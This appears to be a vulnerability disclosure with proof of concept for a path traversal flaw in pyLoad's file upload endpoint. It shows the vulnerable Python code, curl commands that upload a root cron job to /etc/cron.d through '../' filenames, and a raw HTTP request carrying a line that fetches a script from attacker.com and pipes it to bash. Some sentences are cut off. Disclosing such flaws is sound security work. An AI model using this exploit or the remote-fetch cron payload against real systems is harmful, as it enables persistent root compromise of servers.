An authenticated path traversal vulnerability exists in the /json/upload endpoint of the pyLoad By manipulating the filename of an uploaded file, an attacker can traverse out of the intended upload directory, allowing them to write arbitrary files to any location on the system accessible to the pyLoad process. This may lead to:
File: src/pyload/webui/app/blueprints/json_blueprint.py
@json_blueprint.route("/upload", methods=["POST"])
def upload():
dir_path = api.get_config_value("general", "storage_folder")
for file in request.files.getlist("file"):
file_path = os.path.join(dir_path, "tmp_" + file.filename)
file.save(file_path)
Issue: No sanitization or validation on file.filename, allowing traversal via ../../ sequences.
pip install pyload-ng):git clone https://github.com/pyload/pyload
cd pyload
git checkout 0.4.20
python -m pip install -e .
pyload --userdir=/tmp/pyload
python -m venv pyload-env
source pyload-env/bin/activate
pip install pyload==0.4.20
pyload
Login and obtain session token
curl -c cookies.txt -X POST http://127.0.0.1:8000/login \
-d "username=admin&password=admin"
Create malicious cron payload
echo "*/1 * * * * root curl http://attacker.com/payload.sh | bash" > exploit
Upload file with path traversal filename
curl -b cookies.txt -X POST http://127.0.0.1:8000/json/upload \
-F "file=@exploit;filename=../../../../etc/cron.d/pyload_backdoor"
On the next cron tick, a reverse shell or payload will be triggered.
POST /json/upload HTTP/1.1
Host: 127.0.0.1:8000
Cookie: session=SESSION_ID_HERE
Content-Type: multipart/form-data; boundary=------------------------d74496d66958873e
--------------------------d74496d66958873e
Content-Disposition: form-data; name="file"; filename="../../../../etc/cron.d/pyload_backdoor"
Content-Type: application/octet-stream
*/1 * * * * root curl http://attacker.com/payload.sh | bash
--------------------------d74496d66958873e--